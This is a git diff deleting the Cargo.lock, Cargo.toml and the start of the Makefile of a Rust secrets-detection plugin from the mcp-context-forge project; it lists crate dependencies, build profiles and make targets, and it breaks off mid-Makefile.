"2b192c782037fadd9cfa75548310488aabdbf3d2da73885b31bd0abd03351285" -dependencies = [ - "either", -] - -[[package]] -name = "itoa" -version = "1.0.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "92ecc6618181def0457392ccd0ee51198e065e016d1d527a7ac1b6dc7c1f09d2" - -[[package]] -name = "js-sys" -version = "0.3.85" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8c942ebf8e95485ca0d52d97da7c5a2c387d0e7f0ba4c35e93bfcaee045955b3" -dependencies = [ - "once_cell", - "wasm-bindgen", -] - -[[package]] -name = "lalrpop-util" -version = "0.20.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "507460a910eb7b32ee961886ff48539633b788a36b65692b95f225b844c82553" - -[[package]] -name = "libc" -version = "0.2.182" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6800badb6cb2082ffd7b6a67e6125bb39f18782f793520caee8cb8846be06112" - -[[package]] -name = "log" -version = "0.4.29" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" - -[[package]] -name = "maplit" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e2e65a1a2e43cfcb47a895c4c8b10d1f4a61097f9f254f183aee60cad9c651d" - -[[package]] -name = "matrixmultiply" -version = "0.3.10" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a06de3016e9fae57a36fd14dba131fccf49f74b40b7fbdb472f96e361ec71a08" -dependencies = [ - "autocfg", - "rawpointer", -] - -[[package]] -name = "memchr" -version = "2.8.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8ca58f447f06ed17d5fc4043ce1b10dd205e060fb3ce5b979b8ed8e59ff3f79" - -[[package]] -name = "ndarray" -version = "0.17.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "520080814a7a6b4a6e9070823bb24b4531daac8c4627e08ba5de8c5ef2f2752d" -dependencies = [ - "matrixmultiply", - "num-complex", - "num-integer", - "num-traits", - "portable-atomic", - "portable-atomic-util", - "rawpointer", -] - -[[package]] -name = "num-bigint" -version = "0.4.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a5e44f723f1133c9deac646763579fdb3ac745e418f2a7af9cd0c431da1f20b9" -dependencies = [ - "num-integer", - "num-traits", -] - -[[package]] -name = "num-complex" -version = "0.4.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "73f88a1307638156682bada9d7604135552957b7818057dcef22705b4d509495" -dependencies = [ - "num-traits", -] - -[[package]] -name = "num-conv" -version = "0.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf97ec579c3c42f953ef76dbf8d55ac91fb219dde70e49aa4a6b7d74e9919050" - -[[package]] -name = "num-integer" -version = "0.1.46" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7969661fd2958a5cb096e56c8e1ad0444ac2bbcd0061bd28660485a44879858f" -dependencies = [ - "num-traits", -] - -[[package]] -name = "num-traits" -version = "0.2.19" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "071dfc062690e90b734c0b2273ce72ad0ffa95f0c74596bc250dcfd960262841" -dependencies = [ - "autocfg", -] - -[[package]] -name = "numpy" -version = "0.28.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "778da78c64ddc928ebf5ad9df5edf0789410ff3bdbf3619aed51cd789a6af1e2" -dependencies = [ - "libc", - "ndarray", - "num-complex", - "num-integer", - "num-traits", - "pyo3", - "pyo3-build-config", - "rustc-hash 2.1.1", -] - -[[package]] -name = "once_cell" -version = "1.21.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "42f5e15c9953c5e4ccceeb2e7382a716482c34515315f7b03532b8b4e8393d2d" - -[[package]] -name = "oorandom" -version = "11.1.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d6790f58c7ff633d8771f42965289203411a5e5c68388703c06e14f24770b41e" - -[[package]] -name = "ordered-float" -version = "5.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f4779c6901a562440c3786d08192c6fbda7c1c2060edd10006b05ee35d10f2d" -dependencies = [ - "num-traits", -] - -[[package]] -name = "page_size" -version = "0.6.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "30d5b2194ed13191c1999ae0704b7839fb18384fa22e49b57eeaa97d79ce40da" -dependencies = [ - "libc", - "winapi", -] - -[[package]] -name = "phf" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1fd6780a80ae0c52cc120a26a1a42c1ae51b247a253e4e06113d23d2c2edd078" -dependencies = [ - "phf_shared", -] - -[[package]] -name = "phf_codegen" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aef8048c789fa5e851558d709946d6d79a8ff88c0440c587967f8e94bfb1216a" -dependencies = [ - "phf_generator", - "phf_shared", -] - -[[package]] -name = "phf_generator" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c80231409c20246a13fddb31776fb942c38553c51e871f8cbd687a4cfb5843d" -dependencies = [ - "phf_shared", - "rand", -] - -[[package]] -name = "phf_shared" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "67eabc2ef2a60eb7faa00097bd1ffdb5bd28e62bf39990626a582201b7a754e5" -dependencies = [ - "siphasher", -] - -[[package]] -name = "plotters" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5aeb6f403d7a4911efb1e33402027fc44f29b5bf6def3effcc22d7bb75f2b747" -dependencies = [ - "num-traits", - "plotters-backend", - "plotters-svg", - "wasm-bindgen", - "web-sys", -] - -[[package]] -name = "plotters-backend" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "df42e13c12958a16b3f7f4386b9ab1f3e7933914ecea48da7139435263a4172a" - -[[package]] -name = "plotters-svg" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "51bae2ac328883f7acdfea3d66a7c35751187f870bc81f94563733a154d7a670" -dependencies = [ - "plotters-backend", -] - -[[package]] -name = "portable-atomic" -version = "1.13.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c33a9471896f1c69cecef8d20cbe2f7accd12527ce60845ff44c153bb2a21b49" - -[[package]] -name = "portable-atomic-util" -version = "0.2.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7a9db96d7fa8782dd8c15ce32ffe8680bbd1e978a43bf51a34d39483540495f5" -dependencies = [ - "portable-atomic", -] - -[[package]] -name = "powerfmt" -version = "0.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "439ee305def115ba05938db6eb1644ff94165c5ab5e9420d1c1bcedbba909391" - -[[package]] -name = "ppv-lite86" -version = "0.2.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "85eae3c4ed2f50dcfe72643da4befc30deadb458a9b590d720cde2f2b1e97da9" -dependencies = [ - "zerocopy", -] - -[[package]] -name = "proc-macro2" -version = "1.0.106" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8fd00f0bb2e90d81d1044c2b32617f68fcb9fa3bb7640c23e9c748e53fb30934" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "pyo3" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf85e27e86080aafd5a22eae58a162e133a589551542b3e5cee4beb27e54f8e1" -dependencies = [ - "libc", - "once_cell", - "portable-atomic", - "pyo3-build-config", - "pyo3-ffi", - "pyo3-macros", -] - -[[package]] -name = "pyo3-build-config" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8bf94ee265674bf76c09fa430b0e99c26e319c945d96ca0d5a8215f31bf81cf7" -dependencies = [ - "target-lexicon", -] - -[[package]] -name = "pyo3-ffi" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "491aa5fc66d8059dd44a75f4580a2962c1862a1c2945359db36f6c2818b748dc" -dependencies = [ - "libc", - "pyo3-build-config", -] - -[[package]] -name = "pyo3-log" -version = "0.13.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "26c2ec80932c5c3b2d4fbc578c9b56b2d4502098587edb8bef5b6bfcad43682e" -dependencies = [ - "arc-swap", - "log", - "pyo3", -] - -[[package]] -name = "pyo3-macros" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f5d671734e9d7a43449f8480f8b38115df67bef8d21f76837fa75ee7aaa5e52e" -dependencies = [ - "proc-macro2", - "pyo3-macros-backend", - "quote", - "syn", -] - -[[package]] -name = "pyo3-macros-backend" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22faaa1ce6c430a1f71658760497291065e6450d7b5dc2bcf254d49f66ee700a" -dependencies = [ - "heck", - "proc-macro2", - "pyo3-build-config", - "quote", - "syn", -] - -[[package]] -name = "pyo3-stub-gen" -version = "0.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b159f7704044f57d058f528a6f1f22a0a0a327dcb595c5fb38beae658e0338d6" -dependencies = [ - "anyhow", - "chrono", - "either", - "indexmap", - "inventory", - "itertools 0.14.0", - "log", - "maplit", - "num-complex", - "numpy", - "ordered-float", - "pyo3", - "pyo3-stub-gen-derive", - "rustpython-parser", - "serde", - "serde_json", - "time", - "toml", -] - -[[package]] -name = "pyo3-stub-gen-derive" -version = "0.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8c79e7c5b1fcec7c39ab186594658a971c59911eb6fbab5a5932cf2318534be" -dependencies = [ - "heck", - "indexmap", - "proc-macro2", - "quote", - "rustpython-parser", - "syn", -] - -[[package]] -name = "quote" -version = "1.0.44" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "21b2ebcf727b7760c461f091f9f0f539b77b8e87f2fd88131e7f1b433b3cece4" -dependencies = [ - "proc-macro2", -] - -[[package]] -name = "rand" -version = "0.8.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" -dependencies = [ - "libc", - "rand_chacha", - "rand_core", -] - -[[package]] -name = "rand_chacha" -version = "0.3.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" -dependencies = [ - "ppv-lite86", - "rand_core", -] - -[[package]] -name = "rand_core" -version = "0.6.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" -dependencies = [ - "getrandom", -] - -[[package]] -name = "rawpointer" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "60a357793950651c4ed0f3f52338f53b2f809f32d83a07f72909fa13e4c6c1e3" - -[[package]] -name = "rayon" -version = "1.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "368f01d005bf8fd9b1206fb6fa653e6c4a81ceb1466406b81792d87c5677a58f" -dependencies = [ - "either", - "rayon-core", -] - -[[package]] -name = "rayon-core" -version = "1.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22e18b0f0062d30d4230b2e85ff77fdfe4326feb054b9783a3460d8435c8ab91" -dependencies = [ - "crossbeam-deque", - "crossbeam-utils", -] - -[[package]] -name = "regex" -version = "1.12.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e10754a14b9137dd7b1e3e5b0493cc9171fdd105e0ab477f51b72e7f3ac0e276" -dependencies = [ - "aho-corasick", - "memchr", - "regex-automata", - "regex-syntax", -] - -[[package]] -name = "regex-automata" -version = "0.4.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e1dd4122fc1595e8162618945476892eefca7b88c52820e74af6262213cae8f" -dependencies = [ - "aho-corasick", - "memchr", - "regex-syntax", -] - -[[package]] -name = "regex-syntax" -version = "0.8.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a96887878f22d7bad8a3b6dc5b7440e0ada9a245242924394987b21cf2210a4c" - -[[package]] -name = "rustc-hash" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "08d43f7aa6b08d49f382cde6a7982047c3426db949b1424bc4b7ec9ae12c6ce2" - -[[package]] -name = "rustc-hash" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d" - -[[package]] -name = "rustpython-ast" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4cdaf8ee5c1473b993b398c174641d3aa9da847af36e8d5eb8291930b72f31a5" -dependencies = [ - "is-macro", - "num-bigint", - "rustpython-parser-core", - "static_assertions", -] - -[[package]] -name = "rustpython-parser" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "868f724daac0caf9bd36d38caf45819905193a901e8f1c983345a68e18fb2abb" -dependencies = [ - "anyhow", - "is-macro", - "itertools 0.11.0", - "lalrpop-util", - "log", - "num-bigint", - "num-traits", - "phf", - "phf_codegen", - "rustc-hash 1.1.0", - "rustpython-ast", - "rustpython-parser-core", - "tiny-keccak", - "unic-emoji-char", - "unic-ucd-ident", - "unicode_names2", -] - -[[package]] -name = "rustpython-parser-core" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4b6c12fa273825edc7bccd9a734f0ad5ba4b8a2f4da5ff7efe946f066d0f4ad" -dependencies = [ - "is-macro", - "memchr", - "rustpython-parser-vendored", -] - -[[package]] -name = "rustpython-parser-vendored" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "04fcea49a4630a3a5d940f4d514dc4f575ed63c14c3e3ed07146634aed7f67a6" -dependencies = [ - "memchr", - "once_cell", -] - -[[package]] -name = "rustversion" -version = "1.0.22" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" - -[[package]] -name = "same-file" -version = "1.0.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" -dependencies = [ - "winapi-util", -] - -[[package]] -name = "secrets_detection" -version = "1.0.0-RC-1" -dependencies = [ - "criterion", - "log", - "pyo3", - "pyo3-log", - "pyo3-stub-gen", - "regex", -] - -[[package]] -name = "serde" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9a8e94ea7f378bd32cbbd37198a4a91436180c5bb472411e48b5ec2e2124ae9e" -dependencies = [ - "serde_core", - "serde_derive", -] - -[[package]] -name = "serde_core" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41d385c7d4ca58e59fc732af25c3983b67ac852c1a25000afe1175de458b67ad" -dependencies = [ - "serde_derive", -] - -[[package]] -name = "serde_derive" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "serde_json" -version = "1.0.149" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "83fc039473c5595ace860d8c4fafa220ff474b3fc6bfdb4293327f1a37e94d86" -dependencies = [ - "itoa", - "memchr", - "serde", - "serde_core", - "zmij", -] - -[[package]] -name = "serde_spanned" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8bbf91e5a4d6315eee45e704372590b30e260ee83af6639d64557f51b067776" -dependencies = [ - "serde_core", -] - -[[package]] -name = "shlex" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" - -[[package]] -name = "siphasher" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b2aa850e253778c88a04c3d7323b043aeda9d3e30d5971937c1855769763678e" - -[[package]] -name = "static_assertions" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" - -[[package]] -name = "syn" -version = "2.0.116" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3df424c70518695237746f84cede799c9c58fcb37450d7b23716568cc8bc69cb" -dependencies = [ - "proc-macro2", - "quote", - "unicode-ident", -] - -[[package]] -name = "target-lexicon" -version = "0.13.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "adb6935a6f5c20170eeceb1a3835a49e12e19d792f6dd344ccc76a985ca5a6ca" - -[[package]] -name = "time" -version = "0.3.47" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "743bd48c283afc0388f9b8827b976905fb217ad9e647fae3a379a9283c4def2c" -dependencies = [ - "deranged", - "num-conv", - "powerfmt", - "serde_core", - "time-core", -] - -[[package]] -name = "time-core" -version = "0.1.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7694e1cfe791f8d31026952abf09c69ca6f6fa4e1a1229e18988f06a04a12dca" - -[[package]] -name = "tiny-keccak" -version = "2.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2c9d3793400a45f954c52e73d068316d76b6f4e36977e3fcebb13a2721e80237" -dependencies = [ - "crunchy", -] - -[[package]] -name = "tinytemplate" -version = "1.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "be4d6b5f19ff7664e8c98d03e2139cb510db9b0a60b55f8e8709b689d939b6bc" -dependencies = [ - "serde", - "serde_json", -] - -[[package]] -name = "toml" -version = "1.0.3+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c7614eaf19ad818347db24addfa201729cf2a9b6fdfd9eb0ab870fcacc606c0c" -dependencies = [ - "indexmap", - "serde_core", - "serde_spanned", - "toml_datetime", - "toml_parser", - "toml_writer", - "winnow", -] - -[[package]] -name = "toml_datetime" -version = "1.0.0+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "32c2555c699578a4f59f0cc68e5116c8d7cabbd45e1409b989d4be085b53f13e" -dependencies = [ - "serde_core", -] - -[[package]] -name = "toml_parser" -version = "1.0.9+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "702d4415e08923e7e1ef96cd5727c0dfed80b4d2fa25db9647fe5eb6f7c5a4c4" -dependencies = [ - "winnow", -] - -[[package]] -name = "toml_writer" -version = "1.0.6+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ab16f14aed21ee8bfd8ec22513f7287cd4a91aa92e44edfe2c17ddd004e92607" - -[[package]] -name = "unic-char-property" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8c57a407d9b6fa02b4795eb81c5b6652060a15a7903ea981f3d723e6c0be221" -dependencies = [ - "unic-char-range", -] - -[[package]] -name = "unic-char-range" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0398022d5f700414f6b899e10b8348231abf9173fa93144cbc1a43b9793c1fbc" - -[[package]] -name = "unic-common" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "80d7ff825a6a654ee85a63e80f92f054f904f21e7d12da4e22f9834a4aaa35bc" - -[[package]] -name = "unic-emoji-char" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0b07221e68897210270a38bde4babb655869637af0f69407f96053a34f76494d" -dependencies = [ - "unic-char-property", - "unic-char-range", - "unic-ucd-version", -] - -[[package]] -name = "unic-ucd-ident" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e230a37c0381caa9219d67cf063aa3a375ffed5bf541a452db16e744bdab6987" -dependencies = [ - "unic-char-property", - "unic-char-range", - "unic-ucd-version", -] - -[[package]] -name = "unic-ucd-version" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "96bd2f2237fe450fcd0a1d2f5f4e91711124f7857ba2e964247776ebeeb7b0c4" -dependencies = [ - "unic-common", -] - -[[package]] -name = "unicode-ident" -version = "1.0.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6e4313cd5fcd3dad5cafa179702e2b244f760991f45397d14d4ebf38247da75" - -[[package]] -name = "unicode-width" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4ac048d71ede7ee76d585517add45da530660ef4390e49b098733c6e897f254" - -[[package]] -name = "unicode_names2" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d1673eca9782c84de5f81b82e4109dcfb3611c8ba0d52930ec4a9478f547b2dd" -dependencies = [ - "phf", - "unicode_names2_generator", -] - -[[package]] -name = "unicode_names2_generator" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b91e5b84611016120197efd7dc93ef76774f4e084cd73c9fb3ea4a86c570c56e" -dependencies = [ - "getopts", - "log", - "phf_codegen", - "rand", -] - -[[package]] -name = "walkdir" -version = "2.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "29790946404f91d9c5d06f9874efddea1dc06c5efe94541a7d6863108e3a5e4b" -dependencies = [ - "same-file", - "winapi-util", -] - -[[package]] -name = "wasi" -version = "0.11.1+wasi-snapshot-preview1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ccf3ec651a847eb01de73ccad15eb7d99f80485de043efb2f370cd654f4ea44b" - -[[package]] -name = "wasm-bindgen" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "64024a30ec1e37399cf85a7ffefebdb72205ca1c972291c51512360d90bd8566" -dependencies = [ - "cfg-if", - "once_cell", - "rustversion", - "wasm-bindgen-macro", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-macro" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "008b239d9c740232e71bd39e8ef6429d27097518b6b30bdf9086833bd5b6d608" -dependencies = [ - "quote", - "wasm-bindgen-macro-support", -] - -[[package]] -name = "wasm-bindgen-macro-support" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5256bae2d58f54820e6490f9839c49780dff84c65aeab9e772f15d5f0e913a55" -dependencies = [ - "bumpalo", - "proc-macro2", - "quote", - "syn", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-shared" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1f01b580c9ac74c8d8f0c0e4afb04eeef2acf145458e52c03845ee9cd23e3d12" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "web-sys" -version = "0.3.85" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "312e32e551d92129218ea9a2452120f4aabc03529ef03e4d0d82fb2780608598" -dependencies = [ - "js-sys", - "wasm-bindgen", -] - -[[package]] -name = "winapi" -version = "0.3.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" -dependencies = [ - "winapi-i686-pc-windows-gnu", - "winapi-x86_64-pc-windows-gnu", -] - -[[package]] -name = "winapi-i686-pc-windows-gnu" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" - -[[package]] -name = "winapi-util" -version = "0.1.11" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" -dependencies = [ - "windows-sys", -] - -[[package]] -name = "winapi-x86_64-pc-windows-gnu" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" - -[[package]] -name = "windows-core" -version = "0.62.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb" -dependencies = [ - "windows-implement", - "windows-interface", - "windows-link", - "windows-result", - "windows-strings", -] - -[[package]] -name = "windows-implement" -version = "0.60.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "windows-interface" -version = "0.59.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "windows-link" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5" - -[[package]] -name = "windows-result" -version = "0.4.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5" -dependencies = [ - "windows-link", -] - -[[package]] -name = "windows-strings" -version = "0.5.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7837d08f69c77cf6b07689544538e017c1bfcf57e34b4c0ff58e6c2cd3b37091" -dependencies = [ - "windows-link", -] - -[[package]] -name = "windows-sys" -version = "0.61.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc" -dependencies = [ - "windows-link", -] - -[[package]] -name = "winnow" -version = "0.7.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5a5364e9d77fcdeeaa6062ced926ee3381faa2ee02d3eb83a5c27a8825540829" - -[[package]] -name = "zerocopy" -version = "0.8.39" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "db6d35d663eadb6c932438e763b262fe1a70987f9ae936e60158176d710cae4a" -dependencies = [ - "zerocopy-derive", -] - -[[package]] -name = "zerocopy-derive" -version = "0.8.39" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4122cd3169e94605190e77839c9a40d40ed048d305bfdc146e7df40ab0f3e517" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "zmij" -version = "1.0.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa" diff --git a/plugins_rust/secrets_detection/Cargo.toml b/plugins_rust/secrets_detection/Cargo.toml deleted file mode 100644 index 3c1b5f9a5f..0000000000 --- a/plugins_rust/secrets_detection/Cargo.toml +++ /dev/null @@ -1,40 +0,0 @@ -[package] -name = "secrets_detection" -version = "1.0.0-RC-1" -edition = "2024" -authors = ["ContextForge Contributors"] -license = "Apache-2.0" -repository = "https://github.com/IBM/mcp-context-forge" -description = "Secret detection plugin" - -[lib] -name = "secrets_detection_rust" -crate-type = ["cdylib", "rlib"] - -[[bin]] -name = "stub_gen" -path = "src/bin/stub_gen.rs" - -[dependencies] -log = "0.4" -pyo3 = { version = "0.28.2", features = ["abi3-py311"] } -pyo3-log = "0.13.3" -pyo3-stub-gen = "0.19" -regex = "1.12" - -[dev-dependencies] -criterion = { version = "0.8", features = ["html_reports"] } - -[profile.release] -opt-level = 3 -lto = "fat" -codegen-units = 1 -strip = true - -[profile.bench] -inherits = "release" -debug = true - -[[bench]] -name = "secrets_detection" -harness = false diff --git a/plugins_rust/secrets_detection/Makefile b/plugins_rust/secrets_detection/Makefile deleted file mode 100644 index 58229cfb97..0000000000 --- a/plugins_rust/secrets_detection/Makefile +++ /dev/null @@ -1,250 +0,0 @@ -# Makefile for Secrets Detection Plugin (Rust) -# Copyright 2026 -# SPDX-License-Identifier: Apache-2.0 -# -# Plugin-specific operations for secrets_detection -# -# Quick commands: -# make install - Build & install secrets_detection plugin -# make test - Test secrets_detection plugin -# make bench - Benchmark secrets_detection plugin -# make compare - Run Python vs Rust performance comparison - -.PHONY: help build dev test clean check lint fmt bench audit doc install compare verify test-integration bench-compare test-all build-target - -# Default target -.DEFAULT_GOAL := help - -# Project metadata -DIST_DIR := target - -# Colors for output -BLUE := \033[0;34m -GREEN := \033[0;32m -YELLOW := \033[0;33m -RED := \033[0;31m -NC := \033[0m # No Color - -help: ## Show this help message - @echo "$(BLUE)Secrets Detection Plugin Makefile$(NC)" - @echo "" - @echo "$(GREEN)Available targets:$(NC)" - @grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) | awk 'BEGIN {FS = ":.*?## "}; {printf " $(BLUE)%-20s$(NC) %s\n", $$1, $$2}' - @echo "" - @echo "$(YELLOW)Examples:$(NC)" - @echo " make install # Build and install plugin" - @echo " make test # Run tests" - @echo " make bench # Run benchmarks" - @echo " make compare # Compare Python vs Rust performance" - -# Build targets -stub-gen: ## Generate Python type stubs (.pyi files) - @echo "$(GREEN)Generating Python type stubs...$(NC)" - @cargo run --bin stub_gen - @echo "$(GREEN)Type stubs generated$(NC)" - -build: stub-gen ## Build release extension (no install) - @echo "$(GREEN)Building...$(NC)" - @cd ../.. && uv run maturin build --release --manifest-path plugins_rust/secrets_detection/Cargo.toml - @echo 